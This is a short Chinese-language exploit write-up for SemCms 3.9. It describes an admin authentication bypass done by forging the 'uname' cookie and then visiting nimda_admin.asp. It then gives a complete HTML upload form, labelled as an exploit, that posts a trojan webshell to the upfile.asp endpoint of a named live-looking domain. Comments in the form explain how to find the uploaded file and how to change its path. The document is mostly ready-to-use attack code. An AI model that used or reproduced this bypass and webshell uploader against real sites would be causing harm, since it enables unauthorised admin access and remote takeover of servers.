后台验证:
验证文件:Clkj_Inc\WebOut.asp
<% if session("username")<>"" then Set Rs=server.createobject("adodb.recordset") Sql="select * from clkj_admin where clkj_password='"&request.cookies("userpas")("upas")&"'" Rs.open sql,conn,1,1 if not (rs.eof and rs.bof) then session("username")=request.cookies("username")("uname") end if else Response.Write "<script language='javascript'>alert('用户名与密码为空或失效请重新进入!');top.location.href='index.html';</script>" end if %>
只需要修改下 cookie username 的值 uname=任意,访问后台 Clkj_Admin\nimda_admin.asp 即可。
文件名前缀很有意思:nimda
SemCms Exp:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link href="backdoor.css" type="text/css" rel="stylesheet"> <script language="javascript"> <!-- function mysub() { esave.style.visibility="visible"; } --> </script> </head> <body> <form name="form1" method="post" action="http://www.borictrade.cn//Clkj_Admin//upfile.asp" enctype="multipart/form-data" > <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden"> <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0> <TR> <td width=20%></td> <TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0> <TR> <td bgcolor=#ffffff align=center><font color=red>上传利用</font></td> </tr> </table></td> <td width=20%></td> </tr> </table> </div> <table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td align="center" height="50"> <strong>semcms3.9上传利用exp by network QQ 378433756</strong> <input type="hidden" name="filepath" value="/"> <input type="hidden" name="filelx" value=""> <input type="hidden" name="EditName" value=""> <input type="hidden" name="FormName" value=""> <input type="hidden" name="act" value="uploadfile"> </td> </tr> <tr > <td align="center" id="upid" height="30"> 这里写上木马名 <input name="imgname" type="text" id="imgname" size="20" class="tx1" > <font color="#FF0000">//可以不写 上传完右键看源码地址。</font> </td> </tr> <tr > <td align="center" id="upid" height="50">选择木马~图片哦: <input type="file" name="file1" size="45" class="tx1" value=""> <input type="submit" name="Submit" value="上传" > <font color="#FF0000">//这里默认上传到根目录 大家可以再源代码filepath自定义下路径</font> </td> </td> </tr> </table> </form> </body> </html>